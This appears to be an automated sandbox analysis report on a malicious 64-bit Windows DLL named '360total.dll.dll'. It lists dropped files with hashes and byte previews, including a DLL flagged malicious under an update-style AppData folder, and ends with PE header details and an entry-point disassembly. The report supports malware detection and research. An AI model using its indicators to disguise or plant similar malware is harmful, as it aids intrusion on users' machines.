                                                                                            MD5:DB661257F28F8EB3BF2404CF0DBFFD6B
                                                                                            SHA1:E3E7DDBE03733AE94CA5315C180A9AC3A8EEA292
                                                                                            SHA-256:C601248586A5D1DA054E1AD6FF6DB0ECA5501AB386D893A29E20CE66ACB4B32D
                                                                                            SHA-512:F4833EE80EAF3DA1EBCC7F1CB7BB206C5B0D907973C9EF25735E3DC8B0B80D8EE31E1A0A6D4D75D424B834454ED931FB7C6255EB860D6437FB82E8683D847F20
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9C8.tmp.dmp

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 21:15:29 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):57552
                                                                                            Entropy (8bit):1.7255441923702202
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:OJ9Nn2w+w5OMkws/tTwhdF+a1k3p9FkOqROnp:unn2BNrkFZk3Fk4p
                                                                                            MD5:E917C605C46F5731EEAD07FEFFD87606
                                                                                            SHA1:60510B6AEEEBE6FAA98DA66020AF74AFAF67B213
                                                                                            SHA-256:F8530F1DA175A1FD2DA7053F2CF539808DA20F900B2B54A21F66E2FD2B4270E0
                                                                                            SHA-512:576B21BD53BE27BF1725B0549453A37AC1F2062146DEE1CBA0FBFD45B4ADD6C2BBC656DB8A55C1898830930F38A20529EEE6835AA1C80D83F994224FA710CD85
                                                                                            Malicious:false
                                                                                            Preview:MDMP..a..... .......q.,f.........................................-..........T.......8...........T.......................................................................................................................eJ......8.......Lw......................T.......8...Z.,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA94.tmp.WERInternalMetadata.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):7010
                                                                                            Entropy (8bit):3.718491268797514
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RSIU6o7wVetbxfsjh5qY8QPZQtOugaMQUC89b3Sn47oUf0Z1Ngm:R6l7wVeJJsjyY7BQCpDC89bCn4f0Z12m
                                                                                            MD5:5E70EFE54CC55B2D7406433157E8564F
                                                                                            SHA1:88F8D1F34ACB793E6C1063D90400CBED79B26792
                                                                                            SHA-256:0B1B0BF50BD4814240C10008C97EB5A12C6DB2D69AA4303053F162A5A604A6C3
                                                                                            SHA-512:BB7D2B39486EFEBC38DCD68D9785B55E43742D16CD8EC3DFC0E1CB86BB3ECD1286048E409BB3BAE385469208915F3283442927BB5C0B6449C9F96EF0BA185614
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.0.<./.P.i.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAC4.tmp.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4764
                                                                                            Entropy (8bit):4.467449387434158
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zswNJg771I90oSWpW8VYj8Ym8M4JCECy3FkAV2Syq85mohHptSTSDd:uIjfwnI7HW7VWZJBV2SwHpoODd
                                                                                            MD5:9F96ED8F649A993477E363C647C247BF
                                                                                            SHA1:E7B34EB0423D8D611514C4DCDB1259F55CD50806
                                                                                            SHA-256:B55515FDC340F45817C171C8022144F2554707617FCBD6A37CE8C018FB03D603
                                                                                            SHA-512:35104CE51DA7938972CA26897F53A06D09707B8A7A70F5F1484871731FF9DB269E0ADEC393779359AAF56151F8B5AFFA32115D71E0EED29B87C20366A89DD9E9
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                            C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):906752
                                                                                            Entropy (8bit):6.271226161679794
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
                                                                                            MD5:BD3A3714EE9A071EBEB59AC91D9EBB5A
                                                                                            SHA1:55110A221F20A4CEEC34C58D0179FA31F8C102E9
                                                                                            SHA-256:4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
                                                                                            SHA-512:7244220F29057339C99A22C20268187BA6F6681251F4CE4F305AD22DC030F6078B4F298EF10AD392DC5D036C41C7B8C28C2BD997EA39EF7AB023CB9B5C946DC8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: neo.msi, Detection: malicious, Browse
                                                                                            • Filename: neo.msi, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+.f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MPf.%Ug.MPf.&Tg.MPf.&Vg.MPf.&Qg.MPf.MQfoLPf.$Yg.MPf.$Pg.MPf.$.f.MPf.M.f.MPf.$Rg.MPfRich.MPf................PE..d...:5.`..........# .....J..........`........................................@............ ..........................................+......`,..,....0...........d......H?...@..........T.......................(....................`...............................text...(I.......J.................. ..`.rdata.......`.......N..............@..@.data....e...P...0...<..............@....pdata...d.......f...l..............@..@.rsrc........0......................@..@.reloc.......@......................@..Bwsgi2........P.........................@..........!1)FX?@T#s9Cey$lE<HI0x&%czAYeH9a))*C9%fd8%Z<@zCvcK....................................

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2677
                                                                                            Entropy (8bit):3.984740773534546
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8cdST++6HlidAKZdA19ehwiZUklqehSy+3:8Vv8Fy
                                                                                            MD5:F3A60D2CFE7A95B072ABB49ABD709CB1
                                                                                            SHA1:769412D4A4E4A6E32ED0F5B54BAF5352A6970A27
                                                                                            SHA-256:52847069A2D423F0775E43C9CF75860CC84255E224A5CE17DFDB618FAAEAAA4A
                                                                                            SHA-512:74299E49295BADE79039840A4DD05CA2A6C1D111ADD2D7E4C27DD78C37BCD29B3DCBFF7C81E14B180829523DC9FEB509628222B7A5EA89DA5C4D7748CF045B2E
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,.....=4.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2679
                                                                                            Entropy (8bit):4.001318286394295
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:86GdST++6HlidAKZdA1weh/iZUkAQkqeh1y+2:8evO9QQy
                                                                                            MD5:F1B85C4C572F624137C2EF03CB184973
                                                                                            SHA1:86F97AFF78213587952F06FFDD2A6EE0B0D6C58C
                                                                                            SHA-256:1CFECDC50B348933D0F472F0FF02FC687A8BD29B5AB1193CAE1985FB06AC31B2
                                                                                            SHA-512:6D81F66DBE727960BD20E3569318814FD0E8B0715393D3A791AB86C42B5F600D18FF134E69235AACA23F387F7586CD71D5912FF83B78505417ED897366A4200A
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....'+!.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2693
                                                                                            Entropy (8bit):4.010296895695929
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8x/dST++sHlidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xUvwnxy
                                                                                            MD5:31AD1F73B9C3868B035546CD7B2EB898
                                                                                            SHA1:1017725C003B51E85C5E208C7B78261E41A88E56
                                                                                            SHA-256:910EC2DD46813CD1C5A879E3061BF4C5C4B11175614A659D0CD80A0FC242FA4B
                                                                                            SHA-512:30C3B7E0A8A1E4E5A86BCCACE5632DBA33C12C4B782626E48DC7696B198EC7FECCA1B65D87E67AB0CE8F15FFCBFA98BBB33C9F498965C8987FFBB6A321B7B92C
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):4.0008522650406135
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:856dST++6HlidAKZdA1vehDiZUkwqehJy+R:8lvVjy
                                                                                            MD5:48A56767D36A057FD2E1F8D924F8D7C7
                                                                                            SHA1:F9793ACE1FD6D6269445DCA1BA8B456B6869C2B1
                                                                                            SHA-256:80D5FC53ECC4A0D8AC5D83466CE4E80DDD0A7FF2F46D74C4E8426C3534827B05
                                                                                            SHA-512:E116879716E04707FD226F6B212108E5946D4EF29E88BF4B54CA11CE34C487EC7333783032C0415DFDBFFC456DD3D3697BC74DE3850F35EFA8E1731E0F4969E3
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....{.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):3.9865671241481304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8edST++6HlidAKZdA1hehBiZUk1W1qehHy+C:8vvF9ny
                                                                                            MD5:4E7F89B23A0808F2C1A1DDE7E21CF157
                                                                                            SHA1:6C293E22E35740F231113387E10A5D11E848E863
                                                                                            SHA-256:934FC275B78C2EC7A1CA7022CBDA5DC897542823EA26E476A04A6C06B5C15008
                                                                                            SHA-512:17E2D0FD7DAAD2E2D1820EBF0EC931E370E3CDE37CE0A8BBB80B5B67F07D9C6280F1514973C39366ABD7336D368DA2ED2549065E45703DD4CE967B25F5B00EBC
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,......-.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                            Download File
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2683
                                                                                            Entropy (8bit):4.000275288274835
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:85dST++6HlidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8mvZT/TbxWOvTbxy7T
                                                                                            MD5:7AAC7BDD4D6ED112F8C76D41554B88EB
                                                                                            SHA1:6B840AAAF026E47EA7DDE1EB6B31461833B4E7E4
                                                                                            SHA-256:C30732232EE0E2A77CDE149D52757F7717CF270AFCF44E1654BE35EEB2217F36
                                                                                            SHA-512:82D0BB033EB8F484834E121B4E5A8983F4DA099A06D1A256D4F338BC6DC49B9783C6E3BB1B212B968132AC0CFEF67D7F79B7C6DB9768E4E9B48914C72464B205
                                                                                            Malicious:false
                                                                                            Preview:L..................F.@.. ...$+.,....U.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............@O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.422404647548914
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:ZSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:QvloTMW+EZMM6DFy003w
                                                                                            MD5:27E8F530842D1D5DB91E0D8C42A927E8
                                                                                            SHA1:978FD117E2DBB29981F9348318DB84B2953F8BC7
                                                                                            SHA-256:5C93D7F04A8A225DC214D8A04E2949670D42AD9AE4E721E2CACFC5EEA7A77A83
                                                                                            SHA-512:D7A0B3DCAEABFA17599DC1C5FF2A9CED2B9A06FE957C2C580BA2246ADC872021E16909EED028187FC37F712E965216A5B15C35321E3C452D7948DE13F880B771
                                                                                            Malicious:false
                                                                                            Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmRWv...................................................................................................................................................................................................................................................................................................................................................`.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Entropy (8bit):6.271226161679794
                                                                                            TrID:
                                                                                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                            • Win64 Executable (generic) (12005/4) 10.17%
                                                                                            • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                            • DOS Executable Generic (2002/1) 1.70%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                            File name:360total.dll.dll
                                                                                            File size:906'752 bytes
                                                                                            MD5:bd3a3714ee9a071ebeb59ac91d9ebb5a
                                                                                            SHA1:55110a221f20a4ceec34c58d0179fa31f8c102e9
                                                                                            SHA256:4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
                                                                                            SHA512:7244220f29057339c99a22c20268187ba6f6681251f4ce4f305ad22dc030f6078b4f298ef10ad392dc5d036c41c7b8c28c2bd997ea39ef7ab023cb9b5c946dc8
                                                                                            SSDEEP:12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
                                                                                            TLSH:84156B497FA88265C0A7C13AD5938A9AF3F274411F31D78F4161576E3F3B6B24B29322
                                                                                            File Content Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+..f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MP

                                                                                            File Icon

                                                                                            Icon Hash:7ae282899bbab082

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x18006ff60
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x180000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                            DLL Characteristics:HIGH_ENTROPY_VA
                                                                                            Time Stamp:0x60ED353A [Tue Jul 13 06:39:54 2021 UTC]
                                                                                            TLS Callbacks:0x800789b0, 0x1
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:2
                                                                                            File Version Major:5
                                                                                            File Version Minor:2
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:2
                                                                                            Import Hash:908746745c485828202e3664dddf55a1

                                                                                            Authenticode Signature

                                                                                            Signature Valid:
                                                                                            Signature Issuer:
                                                                                            Signature Validation Error:
                                                                                            Error Number:
                                                                                            Not Before, Not After
                                                                                              Subject Chain
                                                                                                Version:
                                                                                                Thumbprint MD5:
                                                                                                Thumbprint SHA-1:
                                                                                                Thumbprint SHA-256:
                                                                                                Serial:

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                dec eax
                                                                                                sub esp, 28h
                                                                                                dec edx
                                                                                                jne 00007F31E86EDAEEh
                                                                                                call 00007F31E86EDBBCh
                                                                                                dec eax
                                                                                                mov dword ptr [000A75C2h], eax
                                                                                                mov eax, 00000001h
                                                                                                dec eax
                                                                                                add esp, 28h
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                dec eax
                                                                                                mov eax, esp
                                                                                                dec eax
                                                                                                mov dword ptr [eax+10h], ebx
                                                                                                dec eax
                                                                                                mov dword ptr [eax+18h], ebp
                                                                                                push esi
                                                                                                push edi
                                                                                                inc ecx
                                                                                                push esi
                                                                                                dec eax
                                                                                                sub esp, 20h
